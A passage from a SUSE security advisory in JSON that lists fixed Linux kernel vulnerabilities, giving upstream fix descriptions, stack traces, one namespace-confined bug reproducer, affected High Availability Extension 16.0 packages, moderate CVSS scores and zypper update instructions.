little cpu.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68211",
"url": "https://www.suse.com/security/cve/CVE-2025-68211"
},
{
"category": "external",
"summary": "SUSE Bug 1255319 for CVE-2025-68211",
"url": "https://bugzilla.suse.com/1255319"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68211"
},
{
"cve": "CVE-2025-68218",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68218"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-multipath: fix lockdep WARN due to partition scan work\n\nBlktests test cases nvme/014, 057 and 058 fail occasionally due to a\nlockdep WARN. As reported in the Closes tag URL, the WARN indicates that\na deadlock can happen due to the dependency among disk-\u003eopen_mutex,\nkblockd workqueue completion and partition_scan_work completion.\n\nTo avoid the lockdep WARN and the potential deadlock, cut the dependency\nby running the partition_scan_work not by kblockd workqueue but by\nnvme_wq.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68218",
"url": "https://www.suse.com/security/cve/CVE-2025-68218"
},
{
"category": "external",
"summary": "SUSE Bug 1255245 for CVE-2025-68218",
"url": "https://bugzilla.suse.com/1255245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68218"
},
{
"cve": "CVE-2025-68227",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68227"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: Fix proto fallback detection with BPF\n\nThe sockmap feature allows bpf syscall from userspace, or based\non bpf sockops, replacing the sk_prot of sockets during protocol stack\nprocessing with sockmap\u0027s custom read/write interfaces.\n\u0027\u0027\u0027\ntcp_rcv_state_process()\n syn_recv_sock()/subflow_syn_recv_sock()\n tcp_init_transfer(BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB)\n bpf_skops_established \u003c== sockops\n bpf_sock_map_update(sk) \u003c== call bpf helper\n tcp_bpf_update_proto() \u003c== update sk_prot\n\u0027\u0027\u0027\n\nWhen the server has MPTCP enabled but the client sends a TCP SYN\nwithout MPTCP, subflow_syn_recv_sock() performs a fallback on the\nsubflow, replacing the subflow sk\u0027s sk_prot with the native sk_prot.\n\u0027\u0027\u0027\nsubflow_syn_recv_sock()\n subflow_ulp_fallback()\n subflow_drop_ctx()\n mptcp_subflow_ops_undo_override()\n\u0027\u0027\u0027\n\nThen, this subflow can be normally used by sockmap, which replaces the\nnative sk_prot with sockmap\u0027s custom sk_prot. The issue occurs when the\nuser executes accept::mptcp_stream_accept::mptcp_fallback_tcp_ops().\nHere, it uses sk-\u003esk_prot to compare with the native sk_prot, but this\nis incorrect when sockmap is used, as we may incorrectly set\nsk-\u003esk_socket-\u003eops.\n\nThis fix uses the more generic sk_family for the comparison instead.\n\nAdditionally, this also prevents a WARNING from occurring:\n\nresult from ./scripts/decode_stacktrace.sh:\n------------[ cut here ]------------\nWARNING: CPU: 0 PID: 337 at net/mptcp/protocol.c:68 mptcp_stream_accept \\\n(net/mptcp/protocol.c:4005)\nModules linked in:\n...\n\nPKRU: 55555554\nCall Trace:\n\u003cTASK\u003e\ndo_accept (net/socket.c:1989)\n__sys_accept4 (net/socket.c:2028 net/socket.c:2057)\n__x64_sys_accept (net/socket.c:2067)\nx64_sys_call (arch/x86/entry/syscall_64.c:41)\ndo_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\nentry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\nRIP: 0033:0x7f87ac92b83d\n\n---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68227",
"url": "https://www.suse.com/security/cve/CVE-2025-68227"
},
{
"category": "external",
"summary": "SUSE Bug 1255216 for CVE-2025-68227",
"url": "https://bugzilla.suse.com/1255216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68227"
},
{
"cve": "CVE-2025-68241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe\n\nThe sit driver\u0027s packet transmission path calls: sit_tunnel_xmit() -\u003e\nupdate_or_create_fnhe(), which lead to fnhe_remove_oldest() being called\nto delete entries exceeding FNHE_RECLAIM_DEPTH+random.\n\nThe race window is between fnhe_remove_oldest() selecting fnheX for\ndeletion and the subsequent kfree_rcu(). During this time, the\nconcurrent path\u0027s __mkroute_output() -\u003e find_exception() can fetch the\nsoon-to-be-deleted fnheX, and rt_bind_exception() then binds it with a\nnew dst using a dst_hold(). When the original fnheX is freed via RCU,\nthe dst reference remains permanently leaked.\n\nCPU 0 CPU 1\n__mkroute_output()\n find_exception() [fnheX]\n update_or_create_fnhe()\n fnhe_remove_oldest() [fnheX]\n rt_bind_exception() [bind dst]\n RCU callback [fnheX freed, dst leak]\n\nThis issue manifests as a device reference count leak and a warning in\ndmesg when unregistering the net device:\n\n unregister_netdevice: waiting for sitX to become free. Usage count = N\n\nIdo Schimmel provided the simple test validation method [1].\n\nThe fix clears \u0027oldest-\u003efnhe_daddr\u0027 before calling fnhe_flush_routes().\nSince rt_bind_exception() checks this field, setting it to zero prevents\nthe stale fnhe from being reused and bound to a new dst just before it\nis freed.\n\n[1]\nip netns add ns1\nip -n ns1 link set dev lo up\nip -n ns1 address add 192.0.2.1/32 dev lo\nip -n ns1 link add name dummy1 up type dummy\nip -n ns1 route add 192.0.2.2/32 dev dummy1\nip -n ns1 link add name gretap1 up arp off type gretap \\\n local 192.0.2.1 remote 192.0.2.2\nip -n ns1 route add 198.51.0.0/16 dev gretap1\ntaskset -c 0 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\ntaskset -c 2 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\nsleep 10\nip netns pids ns1 | xargs kill\nip netns del ns1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68241",
"url": "https://www.suse.com/security/cve/CVE-2025-68241"
},
{
"category": "external",
"summary": "SUSE Bug 1255157 for CVE-2025-68241",
"url": "https://bugzilla.suse.com/1255157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68241"
},
{
"cve": "CVE-2025-68245",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68245"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: netpoll: fix incorrect refcount handling causing incorrect cleanup\n\ncommit efa95b01da18 (\"netpoll: fix use after free\") incorrectly\nignored the refcount and prematurely set dev-\u003enpinfo to NULL during\nnetpoll cleanup, leading to improper behavior and memory leaks.\n\nScenario causing lack of proper cleanup:\n\n1) A netpoll is associated with a NIC (e.g., eth0) and netdev-\u003enpinfo is\n allocated, and refcnt = 1\n - Keep in mind that npinfo is shared among all netpoll instances. In\n this case, there is just one.\n\n2) Another netpoll is also associated with the same NIC and\n npinfo-\u003erefcnt += 1.\n - Now dev-\u003enpinfo-\u003erefcnt = 2;\n - There is just one npinfo associated to the netdev.\n\n3) When the first netpolls goes to clean up:\n - The first cleanup succeeds and clears np-\u003edev-\u003enpinfo, ignoring\n refcnt.\n - It basically calls `RCU_INIT_POINTER(np-\u003edev-\u003enpinfo, NULL);`\n - Set dev-\u003enpinfo = NULL, without proper cleanup\n - No -\u003endo_netpoll_cleanup() is either called\n\n4) Now the second target tries to clean up\n - The second cleanup fails because np-\u003edev-\u003enpinfo is already NULL.\n * In this case, ops-\u003endo_netpoll_cleanup() was never called, and\n the skb pool is not cleaned as well (for the second netpoll\n instance)\n - This leaks npinfo and skbpool skbs, which is clearly reported by\n kmemleak.\n\nRevert commit efa95b01da18 (\"netpoll: fix use after free\") and adds\nclarifying comments emphasizing that npinfo cleanup should only happen\nonce the refcount reaches zero, ensuring stable and correct netpoll\nbehavior.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68245",
"url": "https://www.suse.com/security/cve/CVE-2025-68245"
},
{
"category": "external",
"summary": "SUSE Bug 1255268 for CVE-2025-68245",
"url": "https://bugzilla.suse.com/1255268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68245"
},
{
"cve": "CVE-2025-68261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: add i_data_sem protection in ext4_destroy_inline_data_nolock()\n\nFix a race between inline data destruction and block mapping.\n\nThe function ext4_destroy_inline_data_nolock() changes the inode data\nlayout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS.\nAt the same time, another thread may execute ext4_map_blocks(), which\ntests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks()\nor ext4_ind_map_blocks().\n\nWithout i_data_sem protection, ext4_ind_map_blocks() may receive inode\nwith EXT4_INODE_EXTENTS flag and triggering assert.\n\nkernel BUG at fs/ext4/indirect.c:546!\nEXT4-fs (loop2): unmounting filesystem.\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014\nRIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546\n\nCall Trace:\n \u003cTASK\u003e\n ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681\n _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822\n ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124\n ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255\n ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000\n generic_perform_write+0x259/0x5d0 mm/filemap.c:3846\n ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285\n ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679\n call_write_iter include/linux/fs.h:2271 [inline]\n do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735\n do_iter_write+0x186/0x710 fs/read_write.c:861\n vfs_iter_write+0x70/0xa0 fs/read_write.c:902\n iter_file_splice_write+0x73b/0xc90 fs/splice.c:685\n do_splice_from fs/splice.c:763 [inline]\n direct_splice_actor+0x10f/0x170 fs/splice.c:950\n splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896\n do_splice_direct+0x1a9/0x280 fs/splice.c:1002\n do_sendfile+0xb13/0x12c0 fs/read_write.c:1255\n __do_sys_sendfile64 fs/read_write.c:1323 [inline]\n __se_sys_sendfile64 fs/read_write.c:1309 [inline]\n __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68261",
